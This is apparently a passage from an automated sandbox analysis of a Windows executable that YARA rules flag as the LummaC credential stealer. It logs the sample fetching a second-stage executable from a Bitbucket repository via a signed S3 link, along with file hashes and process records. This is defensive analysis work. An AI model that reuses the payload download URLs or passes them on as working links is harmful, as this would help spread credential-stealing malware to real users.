Set-Cookie: PHPSESSID=30sdha60prk82os9jlkkl7tafv; expires=Sat, 19 Apr 2025 01:37:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqsdHpbO%2B3nHvMdoe%2FgWZjxFC%2FDyoTFBtLE7EsMeJmr%2FwFfauuMvoHHCMRgjDMGu5WIGGuaIIVcoiwFs3JUyCNf%2B7v%2BZ1VIBs0gpSsOBAAVXFIc8OEP7PPTId7oyY24%2F4d4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6f00e60dec41d3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1679&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1658148&cwnd=32&unsent_bytes=0&cid=171af885d53c00ae&ts=791&x=0"
2024-12-24 07:50:58 UTC | 239 | IN | Data Raw: 31 31 30 0d 0a 2f 68 79 39 78 47 42 58 69 53 57 39 4d 72 43 6c 50 43 2b 43 65 62 55 68 36 44 46 6e 43 41 55 6a 45 4c 78 36 34 61 55 6b 68 73 43 6c 5a 35 2b 78 51 6d 32 72 54 63 6c 47 77 4e 59 47 63 36 30 6c 6d 6b 4f 42 52 51 56 39 5a 6b 68 31 79 46 53 4f 31 30 50 61 37 35 4e 6c 30 36 45 58 49 4f 5a 58 31 6b 48 41 78 46 39 4b 73 30 75 47 45 74 6b 44 4f 79 64 32 51 48 37 59 4a 73 37 42 53 2f 47 75 6b 6e 50 63 6f 42 4d 4c 70 6d 50 53 51 4e 33 45 53 46 76 72 46 39 4a 69 67 46 41 56 59 58 46 43 63 74 41 66 7a 38 42 63 34 2b 4c 53 50 74 75 77 51 6d 32 35 43 5a 39 58 6b 70 38 4e 55 71 34 43 6c 31 54 4b 43 30 56 67 63 56 64 67 68 69 62 4f 2b 51 75 33 2b 4d 73 79 6a 2f 56 56 65 62 67 55 6a 68 79 42 6b 32 41 41 37 52
Data Ascii: 110/hy9xGBXiSW9MrClPC+CebUh6DFnCAUjELx64aUkhsClZ5+xQm2rTclGwNYGc60lmkOBRQV9Zkh1yFSO10Pa75Nl06EXIOZX1kHAxF9Ks0uGEtkDOyd2QH7YJs7BS/GuknPcoBMLpmPSQN3ESFvrF9JigFAVYXFCctAfz8Bc4+LSPtuwQm25CZ9Xkp8NUq4Cl1TKC0VgcVdghibO+Qu3+Msyj/VVebgUjhyBk2AA7R (chunk size line "110" = 0x110 = 272 bytes; the base64-looking payload continues in the next read: 234 + 38 payload bytes = 272)
2024-12-24 07:50:58 UTC | 40 | IN | Data Raw: 2f 54 66 63 64 56 41 6d 34 72 52 6d 6a 5a 57 4d 32 48 51 76 4c 69 78 43 79 52 35 67 56 31 73 78 54 41 62 77 3d 3d 0d 0a
Data Ascii: /TfcdVAm4rRmjZWM2HQvLixCyR5gV1sxTAbw==
2024-12-24 07:50:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (zero-length chunk terminating the chunked response)


Session ID: 8
Source IP: 192.168.2.7
Source Port: 49752
Destination IP: 185.166.143.48
Destination Port: 443
PID: 424
Process: C:\Users\user\Desktop\tTGxYWtjG5.exe

Timestamp: 2024-12-24 07:51:00 UTC, Bytes transferred: 248, Direction: OUT
Data:
GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bitbucket.org

Timestamp: 2024-12-24 07:51:01 UTC, Bytes transferred: 5943, Direction: IN
Data:
HTTP/1.1 302 Found
Date: Tue, 24 Dec 2024 07:51:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQp [TRUNCATED]
Expires: Tue, 24 Dec 2024 07:51:00 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 49cdb257586a
X-Version: c9b3998323c0
X-Static-Version: c9b3998323c0
X-Request-Count: 376
X-Render-Time: 0.04333305358886719
X-B3-Traceid: 6b674bb243634c8c92ad6fd30405d936
X-B3-Spanid: b8aaa3863758855f
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian [TRUNCATED]
X-Usage-Quota-Remaining: 999114.779
X-Usage-Request-Cost: 897.87
X-Usage-User-Time: 0.026936
X-Usage-System-Time: 0.000000
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 6b674bb243634c8c92ad6fd30405d936
Atl-Request-Id: 6b674bb2-4363-4c8c-92ad-6fd30405d936
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Server-Timing: atl-edge;dur=154,atl-edge-internal;dur=4,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Session ID: 9
Source IP: 192.168.2.7
Source Port: 49758
Destination IP: 16.15.177.52
Destination Port: 443
PID: 424
Process: C:\Users\user\Desktop\tTGxYWtjG5.exe

Timestamp: 2024-12-24 07:51:03 UTC, Bytes transferred: 1352, Direction: OUT
Data:
GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FY [TRUNCATED]
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com

Timestamp: 2024-12-24 07:51:03 UTC, Bytes transferred: 586, Direction: IN
Data:
HTTP/1.1 200 OK
x-amz-id-2: qJlSH5K3xPnSkSKZ+UBJD+QU0ufuXMLHl0qGf7RjNgpFKUTBBfNzdpwBpQlLZu6J14ryRwnScuIWKKft0ICzyqLJAcTf9Z0DnOP1X+iC5XE=
x-amz-request-id: 0BG80YQZS0WXEXQH
Date: Tue, 24 Dec 2024 07:51:04 GMT
Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
x-amz-server-side-encryption: AES256
x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
Content-Disposition: attachment; filename="FormattingCharitable.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 1325507
Server: AmazonS3
Connection: close


Target ID:1
Start time:02:50:30
Start date:24/12/2024
Path:C:\Users\user\Desktop\tTGxYWtjG5.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\tTGxYWtjG5.exe"
Imagebase:0x9c0000
File size:2'963'968 bytes
MD5 hash:6E0E190CE94E8017D60243ED97725433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1436505307.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1436238542.0000000000859000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:11
Start time:04:00:38
Start date:24/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840
Imagebase:0x6a0000
File size:483'680 bytes
                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              No disassembly